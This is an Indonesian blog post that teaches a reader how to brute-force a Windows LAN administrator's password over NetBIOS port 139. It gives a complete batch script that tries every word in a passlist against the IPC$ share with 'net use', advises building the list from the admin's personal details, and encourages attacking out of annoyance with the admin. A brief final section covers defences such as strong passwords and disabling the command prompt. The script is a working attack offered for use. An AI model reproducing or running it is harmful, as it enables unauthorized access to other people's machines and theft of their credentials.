Port 139 merupakan port yang di gunakan windows dalam sistem jaringan komputernya dengan menjalankan Netbios (Network Basic Input Output System). User yang bisa mengenali dan memanfaatkan port tersebut, akan bisa menggali informasi detail mengenai data jaringan termasuk password folder yang di share serta password administrator.
Kita akan menggunakan program berekstensi bat yang dibuat dari notepad bernama Brute.bat. Sebelumnya, perlu di buat pula beberapa file berektensi txt yakni passlist.txt, logfile.txt dan output.txt. Untuk 2 file terakhir, tidak perlu di isi alias di kosongkan saja. Sedangkan passlist.txt harus di isi dengan kosa kata perkiraan password admin. Tuliskan secara berurutan mulai nama, nama anak, istri, pacar, tangal lahir, tempat bekerja, makanan favouritnya serta semua hal yang di perkirakan sebagai password admin. Di dunia underground, file passlist.txt ini di kenal dengan istilah Dictionary Attack atau kamus serangan.
Teknik menebak password seperti ini memang tergolong memakan waktu lebih lama. Namun, jika di lakukan secara sabar, apalagi di dorong oleh rasa jengkel pada admin, maka semuanya menjadi terasa ringan.
Untuk membuat file brute.bat copykan kode berikut ini:
@echo off
if “%1″==”” goto fin
if “%2″==”” goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo
Sekarang coba anda masuk ke menu Command Prompt melalui tombol Start -> Run ketik cmd. Lalu masuk ke folder tempat file ketiga file tersimpan. jalankan program Brute.bat dengan mengetik Brute . Contoh, Brute 192.169.21.02 Administrator. Untuk mengetahui IP Address admin, download program imaniac di sini . Imaniac adalah software pencari IP Address pada komputer yang terhubung dengan jaringan. Atau cari aja softwarenya di Mbah Google
Jika berhasil menemukan password admin Network Neighbourhood, maka password tersebut akan di simpan di file output.txt yang telah kita buat sebelumnya.
Mencegah Pencurian Password Admin LAN
Untuk mengantisipasi serangan Dictionary Attack, administrator hendaknya membuat password yang kuat dan sulit di tebak melalui kombinasi huruf-angka serta sejumlah karakter lainnya. Di samping itu, perlu juga menonaktifkan menu Command Prompt agar tidak mudah di akses oleh user yang usil. Karena dari mene inilah aktifitas hacking di lakukan seperti Netbios dan lain-lain. Caranya, melalui tombol Start -> Run, ketik gpedit.msc, lalu tekan ENTER. Setelah masuk jendela Group Editor Policy Window, pilih User Configuration -> Administrative Templates -> System ->. Pada jendela sebelah kanan, cari Prevent Access To The Command Prompt lalu double klik. Setelah itu, klik Enable -> Apply -> Ok -> kemudian Restart computer.
Hacking LAN
10:29 AM
Unknown